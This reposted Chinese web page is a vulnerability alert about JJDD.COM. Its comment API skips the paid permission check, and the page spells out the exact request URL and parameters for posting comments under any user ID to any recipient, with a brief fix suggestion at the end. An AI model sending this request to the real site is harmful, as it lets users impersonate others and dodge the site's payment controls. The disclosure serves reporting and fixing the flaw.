您的位置首页百科问答

JJDD.COM绕过权限验证任意留言评论漏洞预警 -电脑资料

Simone 发布于 2025-05-01 05:21:59 574 阅读

JJDD.COM绕过权限验证任意留言评论漏洞预警 -电脑资料

的有关信息介绍如下:

JJDD.COM绕过权限验证任意留言评论漏洞预警 -电脑资料

http://jjdd.com/ 针对有热度的人要回复留言评论等都需要红豆,而红豆要购买,

现在可以直接利用这个接口绕过前台的权限验证

http://www.jjdd.com/comment/add_comment?uid={uid}&ouid={ouid}&relate_uid=&reply_comment_id=&source_id=3&source_type=3&status=1&content=test&pay_card=0

{uid}:发送人的用户ID

{ouid}:接收信息的用户ID

{source_type}:信息类型,目前已知道的有,1是相册;2是个人说说;3是小编专访

{source_id}:信息类型对应的对象ID(通过查看html源码可以知道要回复的对应ID是多少)

透过上面的DEMO地址,将参数对应填入,即可任意留言回复,

JJDD.COM绕过权限验证任意留言评论漏洞预警https://www.unjs.com 修复方案:

在这接口验证权限作者​

标签:JJDD,COM,留言
相关文章
1 xkbm jnkt net 8000(xkbm hebhk com)
552 阅读
2 qq空间怎么设置留言板模块
565 阅读
3 SCANDISK.EXE和CHKDSK.EXE以及SYS.COM说明
513 阅读
4 米画师如何设置离线留言板内容
529 阅读
5 校园上网帐号共享多用打破dr.com客户端
581 阅读